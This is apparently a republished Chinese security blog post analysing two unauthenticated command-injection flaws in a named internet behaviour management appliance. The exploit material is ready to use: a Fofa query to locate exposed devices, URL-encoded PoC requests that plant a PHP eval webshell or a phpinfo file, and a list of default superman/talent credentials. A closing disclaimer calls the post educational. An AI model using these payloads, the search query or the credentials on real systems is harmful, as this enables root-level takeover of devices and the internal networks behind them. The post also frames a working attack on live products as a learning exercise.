一日偶然情况拿到一套某设备源码,设备大概长这个样子:
以下打码*内容自动脑补!!!
通过对源码分析一共开放三个端口如下:
对不同端口进行代码分析获得如下漏洞。
漏洞分析一:(0day)9091端口
从Nday到0day的一个故事(也不算0day吧),首先来源是华域Reporter命令注入漏洞分析的文章,发现是因为华域Reporter使用了一个组件导致的漏洞,该组件的设备较多,多用于上网行为管理设备的报表系统,正好这个天某信上网行为管理系统也有。
该漏洞利用难度低,影响范围较广,无需登录可直接以root权限执行任意命令,从而控制该设备,进而控制内网其它服务器和终端设备,该设备一旦被控制,可能会影响到整个内网。
Fofa:
title=="Login @ Reporter" && body="xx信"app="xx信-上网行为管理系统" && title=="Login @ Reporter"
漏洞分析
路径:/www/reporter/view/Behavior/toQuery.php
通过代码可以看出
if ($_GET ["method"] == "getList" || $_GET ["method"] == "import") {当method=getList进入if分支,并且objclass只要不为空就可以
看到使用了exec函数$cmd可以通过objClass控制
控制值
objClass=%0aecho%20%27%3C?php%20@eval($_POST[%22x%22]);%20?%3E%27%3E/var/www/reporter/view/Behavior/shell.php%0a上传成功
POC:
/view/Behavior/toQuery.php?method=getList&objClass=%0aecho%20%27%3C?php%20@eval($_POST[%22x%22]);%20?%3E%27%3E/var/www/reporter/view/Behavior/shell.php%0a路径:
http://ip/view/Behavior/shell.php
漏洞分析二:某上网行为管理系统RCE(nday)8080端口
POC:
前两天某行动看到一个poc如下:
view/IPV6/naborTable/static_convert.php?blocks[0]=||%20 echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0aBase64版
/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20 echo%20PD9waHAgcGhwaW5mbygpOz8+%20%7Cbase64%20-d%20%3E%3E%20/var/www/html/1.php%0a漏洞分析
对代码进行搜索
找到相关文件进行分析
通过代码可以看出
foreach($_REQUEST["blocks"] as $key => $info){$cmd = "ip -6 neigh del ".$info;
通过变量覆盖控制blocks赋给key值进行命令执行
控制值:
blocks[0]=||%20 echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0a进行上传。
附:某设备密码字典
test/123456superman / talentsuperman telent用户名:superman 密码:talent用户名:superman 密码:talent123用户名:superman 密码:talent@123用户名:superman 密码:talent@123456
此漏洞内部已知,本文章只做学习使用,任何非法行为与本公众号无关!
此漏洞内部已知,本文章只做学习使用,任何非法行为与本公众号无关!
此漏洞内部已知,本文章只做学习使用,任何非法行为与本公众号无关!
原文始发于微信公众号(河北网络安全高校联盟):某安全设备rce漏洞分析(0day和nday)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论